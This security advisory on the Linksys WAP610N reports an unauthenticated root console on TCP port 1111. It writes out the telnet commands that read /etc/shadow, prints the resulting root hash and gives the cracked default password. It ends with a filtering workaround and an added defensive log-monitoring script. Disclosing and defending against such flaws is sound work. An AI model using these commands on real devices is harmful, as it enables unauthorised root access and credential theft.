Friday, February 11, 2011

Linksys WAP610N Unauthenticated Root Access Security Vulnerability

Secure Network - Security Research Advisory

Vuln name: Linksys WAP610N Unauthenticated Access With Root Privileges
Systems affected: WAP610N (Firmware Version: 1.0.01)
Systems not affected: --
Severity: High
Local/Remote: Remote
Vendor URL: http://www.linksysbycisco.com
Author(s): Matteo Ignaccolo m.ignaccolo () securenetwork it
Vendor disclosure: 14/06/2010
Vendor acknowledged: 14/06/2010
Vendor bugfix: 14/12/2010 (reply to our request for update)
Vendor patch release: ??
Public disclosure: 10/02/2010
Advisory number: SN-2010-08
Advisory URL: http://www.securenetwork.it/ricerca/advisory/download/SN-2010-08.txt


*** SUMMARY ***

The Linksys WAP610N is a SOHO wireless access point supporting draft 802.11n.

An unauthenticated, remotely reachable text-based administration console was
found that allows an attacker to run system commands as the root user.


*** VULNERABILITY DETAILS ***

telnet 1111

Command> system id
Output> uid=0(root) gid=0(root)

Command> system cat /etc/shadow
Output> root:$1$ZAwqf2dI$ZukbihyQtUghNDsLAQaP31:10933:0:99999:7:::
Output> bin:*:10933:0:99999:7:::
Output> daemon:*:10933:0:99999:7:::
Output> adm:*:10933:0:99999:7:::
Output> lp:*:10933:0:99999:7:::
Output> sync:*:10933:0:99999:7:::
Output> shutdown:*:10933:0:99999:7:::
Output> halt:*:10933:0:99999:7:::
Output> uucp:*:10933

The root password is "wlan" (cracked with MDcrack, http://mdcrack.openwall.net).

List of console commands:

ATHENA_READ
ATHENA_WRITE
CHIPVAR_GET
DEBUGTABLE
DITEM
DMEM
DREG16
DREG32
DREG8
DRV_CAT_FREE
DRV_CAT_INIT
DRV_NAME_GET
DRV_VAL_GET
DRV_VAL_SET
EXIT
GENIOCTL
GETMIB
HELP
HYP_READ
HYP_WRITE
HYP_WRITEBUFFER
ITEM16
ITEM32
ITEM8
ITEMLIST
MACCALIBRATE
MACVARGET
MACVARSET
MEM_READ
MEM_WRITE
MTAPI
PITEMLIST
PRINT_LEVEL
PROM_READ
PROM_WRITE
READ_FILE
REBOOT
RECONF
RG_CONF_GET
RG_CONF_SET
RG_SHELL
SETMIB
SHELL
STR_READ
STR_WRITE
SYSTEM
TEST32
TFTP_GET
TFTP_PUT
VER


*** EXPLOIT ***

Attackers may exploit this issue with a standard telnet client, as shown
above.


*** FIX INFORMATION ***

No patch is available.

*** WORKAROUNDS ***

Put the access points on a separate wired network segment and filter network
traffic to/from TCP port 1111.
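To check that the filtering workaround above actually holds, a defender can watch firewall logs for connections to the console port from outside the management segment. The script below is an added example, not part of the advisory; the iptables-style log lines, the AP addresses and the management network are constructed for illustration.

```python
import ipaddress
import re

# Constructed sample iptables LOG lines (not taken from the advisory).
SAMPLE_LOG = """\
Feb 11 10:01:02 gw kernel: FW-IN: IN=eth1 OUT= SRC=10.0.5.23 DST=10.0.1.10 PROTO=TCP SPT=51234 DPT=1111 SYN
Feb 11 10:01:05 gw kernel: FW-IN: IN=eth0 OUT= SRC=192.168.100.5 DST=10.0.1.10 PROTO=TCP SPT=40000 DPT=1111 SYN
Feb 11 10:01:07 gw kernel: FW-IN: IN=eth1 OUT= SRC=10.0.5.23 DST=10.0.1.10 PROTO=TCP SPT=51235 DPT=80 SYN
Feb 11 10:01:09 gw kernel: FW-IN: IN=eth1 OUT= SRC=10.0.5.40 DST=10.0.1.11 PROTO=UDP SPT=5353 DPT=1111
"""

CONSOLE_PORT = 1111  # TCP port of the WAP610N console named in the advisory

# Extract source, destination, protocol and destination port from a LOG line.
LOG_RE = re.compile(
    r"SRC=(?P<src>\S+) DST=(?P<dst>\S+) PROTO=(?P<proto>\S+) .*?DPT=(?P<dpt>\d+)"
)


def find_console_access(log_text, ap_addresses, mgmt_networks):
    """Return (src, dst) pairs for TCP/1111 connections to an access point
    that originate outside the allowed management networks."""
    aps = {ipaddress.ip_address(a) for a in ap_addresses}
    mgmt = [ipaddress.ip_network(n) for n in mgmt_networks]
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.search(line)
        if not m or m.group("proto") != "TCP" or int(m.group("dpt")) != CONSOLE_PORT:
            continue  # not a TCP connection to the console port
        src = ipaddress.ip_address(m.group("src"))
        dst = ipaddress.ip_address(m.group("dst"))
        if dst in aps and not any(src in net for net in mgmt):
            hits.append((str(src), str(dst)))
    return hits


def console_filter_rules(ap_addresses, mgmt_networks):
    """Build iptables FORWARD rules implementing the workaround: allow the
    management networks to reach TCP/1111 on the APs, drop everyone else.
    Assumes the APs sit behind a Linux gateway (a hypothetical layout)."""
    rules = []
    for ap in ap_addresses:
        for net in mgmt_networks:
            rules.append(f"iptables -A FORWARD -p tcp -s {net} -d {ap} --dport {CONSOLE_PORT} -j ACCEPT")
        rules.append(f"iptables -A FORWARD -p tcp -d {ap} --dport {CONSOLE_PORT} -j DROP")
    return rules


if __name__ == "__main__":
    for src, dst in find_console_access(SAMPLE_LOG, ["10.0.1.10", "10.0.1.11"], ["192.168.100.0/24"]):
        print(f"ALERT: console access to {dst} from non-management host {src}")
```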
